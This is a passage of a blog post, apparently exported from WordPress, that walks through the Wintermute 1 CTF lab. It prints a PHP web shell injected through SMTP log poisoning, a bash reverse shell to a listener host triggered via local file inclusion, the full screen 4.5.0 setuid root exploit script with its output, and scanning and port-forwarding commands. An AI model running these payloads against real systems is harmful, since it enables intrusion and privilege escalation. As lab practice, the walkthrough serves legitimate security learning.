href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849266.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849266.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303143329053\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Try using it:<\/p>\n<pre><code class=\"language-bash\">\/turing-bolo\/bolo.php?bolo=\/var\/log\/mail<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849267.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849267.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303143122442\" \/><\/div><\/p>\n<p>Try uploading a one-line web shell:<\/p>\n<pre><code class=\"language-smtp\">telnet 192.168.244.130 25\nHELO ctfer\nMAIL FROM: ctfer@gmail.com\nRCPT TO: wintermute\nsubject: &lt;?php system($_REQUEST[&#039;ctf&#039;]);?&gt;\n.\nquit<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849268.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849268.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303152422504\" \/><\/div><\/p>\n<p>Try popping a reverse shell:<\/p>\n<pre><code class=\"language-bash\">bash -c &quot;bash -i &gt;&amp; \/dev\/tcp\/192.168.244.132\/1234 0&gt;&amp;1&quot;\nbash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.244.132%2f1234+0%3e%261%22<\/code><\/pre>\n<pre><code class=\"language-bash\">http:\/\/192.168.244.130\/turing-bolo\/bolo.php?bolo=\/var\/log\/mail&amp;ctf=bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.244.132%2f1234+0%3e%261%22<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849269.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849269.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303153528246\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Got a shell!<\/p>\n<h2>Privilege escalation<\/h2>\n<h3>First, list the SUID files<\/h3>\n<pre><code class=\"language-bash\">find \/ -perm -4000 
2&gt;\/dev\/null<\/code><\/pre>\n<pre><code class=\"language-apl\">\/bin\/su\n\/bin\/umount\n\/bin\/mount\n\/bin\/screen-4.5.0\n\/bin\/ping\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign<\/code><\/pre>\n<p>It looks like <code>screen<\/code> can be exploited. Checking <code>sudo screen<\/code> shows that there is no <code>sudo<\/code> command:<\/p>\n<h3>Checking for the screen 4.5 vulnerability<\/h3>\n<p>Look up the vulnerability:<\/p>\n<pre><code class=\"language-bash\">searchsploit screen 4.5.0<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849270.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849270.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303154926642\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Take a look:<\/p>\n<pre><code class=\"language-bash\">searchsploit -m linux\/local\/41154.sh <\/code><\/pre>\n<pre><code class=\"language-sh\">#!\/bin\/bash                                                                                 \n# screenroot.sh                                                                             \n# setuid screen v4.5.0 local root exploit                                                   \n# abuses ld.so.preload overwriting to get 
root.                                             \n# bug: https:\/\/lists.gnu.org\/archive\/html\/screen-devel\/2017-01\/msg00025.html                \n# HACK THE PLANET                                                                           \n# ~ infodox (25\/1\/2017)                                                                     \necho &quot;~ gnu\/screenroot ~&quot;                                                                   \necho &quot;[+] First, we create our shell and library...&quot;                                        \ncat &lt;&lt; EOF &gt; \/tmp\/libhax.c                                                                  \n#include &lt;stdio.h&gt;                                                                          \n#include &lt;sys\/types.h&gt;                                                                      \n#include &lt;unistd.h&gt;                                                                         \n__attribute__ ((__constructor__))                                                           \nvoid dropshell(void){                         \n    chown(&quot;\/tmp\/rootshell&quot;, 0, 0);\n    chmod(&quot;\/tmp\/rootshell&quot;, 04755);\n    unlink(&quot;\/etc\/ld.so.preload&quot;);  \n    printf(&quot;[+] done!\\n&quot;);       \n}                                             \nEOF\ngcc -fPIC -shared -ldl -o \/tmp\/libhax.so \/tmp\/libhax.c\nrm -f \/tmp\/libhax.c                                                                         \ncat &lt;&lt; EOF &gt; \/tmp\/rootshell.c\n#include &lt;stdio.h&gt;                            \nint main(void){   \n    setuid(0); \n    setgid(0);\n    seteuid(0);\n    setegid(0);\n    execvp(&quot;\/bin\/sh&quot;, NULL, NULL);\n}                              \nEOF                                           \ngcc -o \/tmp\/rootshell \/tmp\/rootshell.c\nrm -f \/tmp\/rootshell.c                        \necho &quot;[+] Now we create our \/etc\/ld.so.preload file...&quot;\ncd \/etc                
                       \numask 000 # because                           \nscreen -D -m -L ld.so.preload echo -ne  &quot;\\x0a\/tmp\/libhax.so&quot; # newline needed\necho &quot;[+] Triggering...&quot;\nscreen -ls # screen itself is setuid, so...\n\/tmp\/rootshell   <\/code><\/pre>\n<p>First try this script. Its overall logic is to create two C files, compile them, and then run commands. Run it:<\/p>\n<pre><code class=\"language-bash\"># kali\npython3 -m http.server 8888\n# wintermute\nwget http:\/\/192.168.244.132:8888\/41154.sh\nchmod +x 41154.sh\n.\/41154.sh<\/code><\/pre>\n<pre><code class=\"language-text\">~ gnu\/screenroot ~                                                                         \n[+] First, we create our shell and library...                                              \n\/tmp\/libhax.c: In function &#039;dropshell&#039;:                                                    \n\/tmp\/libhax.c:7:5: warning: implicit declaration of function &#039;chmod&#039; [-Wimplicit-function-declaration]\n     chmod(&quot;\/tmp\/rootshell&quot;, 04755);                                                       \n     ^~~~~ \n\/tmp\/rootshell.c: In function &#039;main&#039;:\n\/tmp\/rootshell.c:3:5: warning: implicit declaration of function &#039;setuid&#039; [-Wimplicit-function-declaration]\n     setuid(0);                              \n     ^~~~~~                                                                                \n\/tmp\/rootshell.c:4:5: warning: implicit declaration of function &#039;setgid&#039; [-Wimplicit-function-declaration]\n     setgid(0);\n     ^~~~~~\n\/tmp\/rootshell.c:5:5: warning: implicit declaration of function &#039;seteuid&#039; [-Wimplicit-function-declaration]\n     seteuid(0);\n     ^~~~~~~   \n\/tmp\/rootshell.c:6:5: warning: implicit declaration of function &#039;setegid&#039; 
[-Wimplicit-function-declaration]\n     setegid(0);                                                                           \n     ^~~~~~~    \n\/tmp\/rootshell.c:7:5: warning: implicit declaration of function &#039;execvp&#039; [-Wimplicit-function-declaration]\n     execvp(&quot;\/bin\/sh&quot;, NULL, NULL);           \n     ^~~~~~                                   \n[+] Now we create our \/etc\/ld.so.preload file...                                            \n[+] Triggering...                             \n&#039; from \/etc\/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.    \n[+] done!                                     \nNo Sockets found in \/tmp\/screens\/S-www-data.<\/code><\/pre>\n<p>The errors above can actually be reduced: run the following sed command to convert the line endings and indentation of the script:<\/p>\n<pre><code class=\"language-bash\">sed -i -e &#039;s\/\\r$\/\/&#039; 41154.sh<\/code><\/pre>\n<ul>\n<li><code>-i<\/code>: This option tells sed to modify the file in place instead of writing to standard output.<\/li>\n<li><code>-e &#039;s\/\\r$\/\/&#039;<\/code>: This is the sed editing command. In it, <code>s<\/code> performs a substitution, <code>\\r$<\/code> matches the carriage return at the end of a line (Unix systems normally do not use carriage returns), and <code>\/\/<\/code> replaces it with nothing, that is, deletes the carriage return.<\/li>\n<\/ul>\n<p>Run a command to check:<\/p>\n<pre><code class=\"language-bash\">whoami;id\nroot\nuid=0(root) gid=0(root) 
groups=0(root),33(www-data)<\/code><\/pre>\n<p>Got the flag; now see what clues the author left for us:<\/p>\n<pre><code class=\"language-apl\">ls -la \/root<\/code><\/pre>\n<pre><code class=\"language-text\">total 52\ndrwx------  4 root root  4096 Jul  3  2018 .\ndrwxr-xr-x 23 root root  4096 May 12  2018 ..\n-rw-------  1 root root     0 Jul  3  2018 .bash_history\n-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc\ndrwxr-xr-x  2 root root  4096 May 12  2018 .nano\n-rw-r--r--  1 root root   148 Aug 17  2015 .profile\n-rw-r--r--  1 root root    66 May 12  2018 .selected_editor\n-rw-------  1 root root 12459 Jul  3  2018 .viminfo\n-rw-------  1 root root    33 Jul  1  2018 flag.txt\n-rw-------  1 root root   778 Jul  1  2018 note.txt\ndrwxr-xr-x  2 root root  4096 May 12  2018 scripts<\/code><\/pre>\n<pre><code class=\"language-apl\">cat \/root\/flag.txt<\/code><\/pre>\n<pre><code class=\"language-text\">5ed185fd75a8d6a7056c96a436c6d8aa<\/code><\/pre>\n<pre><code class=\"language-apl\">cat \/root\/note.txt<\/code><\/pre>\n<pre><code class=\"language-text\">Devs,\n\nLady 3Jane has asked us to create a custom java app on Neuromancer&#039;s primary server to help her interact w\/ the AI via a web-based GUI.\n\nThe engineering team couldn&#039;t strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. 
For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.\n\nAnyways, we&#039;ve deployed the war file on tomcat as ordered - located here:\n\n\/struts2_2.3.15.1-showcase\n\nIt&#039;s ready for the devs to customize to her liking...I&#039;m stating the obvious, but make sure to secure this thing.\n\nRegards,\n\nBob Laugh\nTuring Systems Engineer II\nFreeside\/\/Straylight\/\/Ops5<\/code><\/pre>\n<p>This leaks component information, <code>struts2_2.3.15.1-showcase<\/code>, which we can try as an entry point later!<\/p>\n<h1>Neuromancer<\/h1>\n<h2>Upgrade the shell<\/h2>\n<pre><code class=\"language-bash\">python -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;<\/code><\/pre>\n<h2>Information gathering<\/h2>\n<h3>Host discovery (configuration failed)<\/h3>\n<h4>ifconfig<\/h4>\n<pre><code class=\"language-apl\">ifconfig<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849271.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849271.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303172302935\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>arp<\/h4>\n<pre><code class=\"language-apl\">arp -a<\/code><\/pre>\n<pre><code class=\"language-text\">? (192.168.244.132) at 08:00:27:99:84:97 [ether] on enp0s8\n? 
(192.168.244.132) at 08:00:27:99:84:97 [ether] on enp0s3\n? (192.168.244.128) at 08:00:27:14:96:11 [ether] on enp0s8\n? (192.168.244.128) at 08:00:27:14:96:11 [ether] on enp0s3<\/code><\/pre>\n<h4>Shell script<\/h4>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n# Network prefix (first three octets) of the \/24 segment to scan, e.g. 192.168.244\nsubnet=&quot;10.0.2&quot;\necho &quot;\u63a2\u6d4b\u5b58\u6d3b\u4e3b\u673a\u4e2d...&quot;\n# Loop over every host address in the segment\nfor ip in $(seq 1 254); do\n    target=&quot;$subnet.$ip&quot;\n    # Send a single ping request, discarding stdout and stderr and keeping only the exit status\n    ping -c 1 -W 1 &quot;$target&quot; &gt;\/dev\/null 2&gt;&amp;1\n    # Check the exit status of the ping command\n    if [ $? -eq 0 ]; then\n        echo &quot;$target \u5b58\u6d3b&quot;\n    fi\ndone\necho &quot;\u63a2\u6d4b\u5b8c\u6210&quot;<\/code><\/pre>\n<h1>Reconfiguration<\/h1>\n<p>After scanning the network interfaces here, I found that some were not picked up, so I reconfigured the target machines. If that works, I will paste the configuration in later.<\/p>\n<p>Because the lab has to be reconfigured from scratch, the earlier steps are condensed into simple commands:<\/p>\n<pre><code class=\"language-bash\">telnet 10.161.61.130 25\nHELO ctfer\nMAIL FROM: ctfer@gmail.com\nRCPT TO: wintermute\nsubject: &lt;?php system($_REQUEST[&#039;ctf&#039;]);?&gt;\n.\nquit\nhttp:\/\/10.161.61.130\/turing-bolo\/bolo.php?bolo=\/var\/log\/mail&amp;ctf=bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f10.161.61.128%2f1234+0%3e%261%22<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[\/tmp]\n\u2514\u2500$ nc -lvnp 
1234\nlistening on [any] 1234 ...\nconnect to [10.161.61.128] from (UNKNOWN) [10.161.61.130] 45876\nbash: cannot set terminal process group (642): Inappropriate ioctl for device\nbash: no job control in this shell\nwww-data@straylight:\/var\/www\/html\/turing-bolo$ cd \/tmp\ncd \/tmp\nwww-data@straylight:\/tmp$ ls\nls\n41154.sh\nlibhax.so\nrootshell\nscreens\nvGdtL8p\nwww-data@straylight:\/tmp$ .\/rootshell\n.\/rootshell\nwhoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root),33(www-data)\npython -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;\nroot@straylight:\/tmp# ifconfig\nifconfig\nenp0s3: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 10.161.61.130  netmask 255.255.255.0  broadcast 10.161.61.255\n        inet6 fe80::a00:27ff:fe8f:6d52  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:8f:6d:52  txqueuelen 1000  (Ethernet)\n        RX packets 5311  bytes 484772 (473.4 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 1186  bytes 82951 (81.0 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nenp0s8: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 10.0.2.5  netmask 255.255.255.0  broadcast 10.0.2.255\n        inet6 fe80::a00:27ff:fe79:202d  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:79:20:2d  txqueuelen 1000  (Ethernet)\n        RX packets 55  bytes 8493 (8.2 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 70  bytes 6905 (6.7 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nlo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536\n        inet 127.0.0.1  netmask 255.0.0.0\n        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;\n        loop  txqueuelen 1  (Local Loopback)\n        RX packets 13058  bytes 1348746 (1.2 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 13058  bytes 1348746 (1.2 MiB)\n        TX errors 0  dropped 0 
overruns 0  carrier 0  collisions 0\n\nroot@straylight:\/tmp# ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:8f:6d:52 brd ff:ff:ff:ff:ff:ff\n    inet 10.161.61.130\/24 brd 10.161.61.255 scope global enp0s3\n       valid_lft forever preferred_lft forever\n    inet6 fe80::a00:27ff:fe8f:6d52\/64 scope link \n       valid_lft forever preferred_lft forever\n3: enp0s8: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:79:20:2d brd ff:ff:ff:ff:ff:ff\n    inet 10.0.2.5\/24 brd 10.0.2.255 scope global enp0s8\n       valid_lft forever preferred_lft forever\n    inet6 fe80::a00:27ff:fe79:202d\/64 scope link \n       valid_lft forever preferred_lft forever\n<\/code><\/pre>\n<pre><code class=\"language-text\">for i in $(seq 1 65535); do nc -nvz -w 1 10.0.2.3 $i 2&gt;&amp;1; done | grep -v &quot;Connection refused&quot;\nfor i in {1..254} ;do (ping -c 1 10.161.61.$i | grep &quot;bytes from&quot; &amp;) ;done\nfor i in $(seq 1 65535); do nc -nvz -w 1 192.168.244.3 $i 2&gt;&amp;1; done | grep -v &quot;Connection refused&quot;<\/code><\/pre>\n<p>In theory these approaches are correct, but I just could not get any scan results, and I do not know why.<\/p>\n<h1>Lab configuration problem: could not finish it, so reading write-ups to learn the next steps<\/h1>\n<p>Normally the scan finds three ports:<\/p>\n<pre><code class=\"language-text\">(UNKNOWN) 
[192.168.56.110] 8009 (?) open\n(UNKNOWN) [192.168.56.110] 8080 (http-alt) open\n(UNKNOWN) [192.168.56.110] 34483 (?) open<\/code><\/pre>\n<p>Browsing to them directly shows nothing; the ports have to be forwarded first:<\/p>\n<pre><code class=\"language-bash\">socat TCP-LISTEN:8009,fork,reuseaddr tcp:192.168.56.110:8009 &amp;\nsocat TCP-LISTEN:8000,fork,reuseaddr tcp:192.168.56.110:8080 &amp;\nsocat TCP-LISTEN:34483,fork,reuseaddr tcp:192.168.56.110:34483 &amp;<\/code><\/pre>\n<p>Then scan with nmap, using its bundled scripts:<\/p>\n<pre><code class=\"language-bash\">nmap -sV -v -p 8009,8080,34483 -Pn -A --script=vuln 192.168.56.110<\/code><\/pre>\n<p>Visit:<\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.56.110:8080\/struts2_2.3.15.1-showcase\/showcase.action<\/code><\/pre>\n<p>Then attack using the Apache Struts vulnerability. There still seems to be a lot left to do and I am worn out, so I will shelve this for now and try again when I get the chance!<\/p>\n<h1>Reference blogs<\/h1>\n<p><a href=\"https:\/\/www.hackingarticles.in\/hack-the-wintermute-1-ctf-challenge\/\">https:\/\/www.hackingarticles.in\/hack-the-wintermute-1-ctf-challenge\/<\/a><\/p>\n<p><a href=\"https:\/\/seekorswim.github.io\/walkthroughs\/2019\/05\/01\/wintermute-1\/\">https:\/\/seekorswim.github.io\/walkthroughs\/2019\/05\/01\/wintermute-1\/<\/a><\/p>\n<p><a href=\"https:\/\/www.cnblogs.com\/jarwu\/p\/17411962.html\">https:\/\/www.cnblogs.com\/jarwu\/p\/17411962.html<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/qq_34801745\/article\/details\/103987311\">https:\/\/blog.csdn.net\/qq_34801745\/article\/details\/103987311<\/a><\/p>\n<p><a href=\"https:\/\/fdlucifer.github.io\/2020\/01\/13\/WinterMute-1\/\">https:\/\/fdlucifer.github.io\/2020\/01\/13\/WinterMute-1\/<\/a><\/p>\n<p><a 
href=\"https:\/\/www.freebuf.com\/articles\/web\/259582.html\">https:\/\/www.freebuf.com\/articles\/web\/259582.html<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/G20171130\/article\/details\/118805915\">https:\/\/blog.csdn.net\/G20171130\/article\/details\/118805915<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/mzfr\/vulnhub-writeups\/blob\/master\/2019-07-26-wintermute.md\">https:\/\/github.com\/mzfr\/vulnhub-writeups\/blob\/master\/2019-07-26-wintermute.md<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WINTERMUTE1 Configuring the lab Open it up and there is a setup guide: Wintermute Vitrual Box S [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-391","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=391"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/391\/revisions"}],"predecessor-version":[{"id":393,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/391\/revisions\/393"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=391
"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}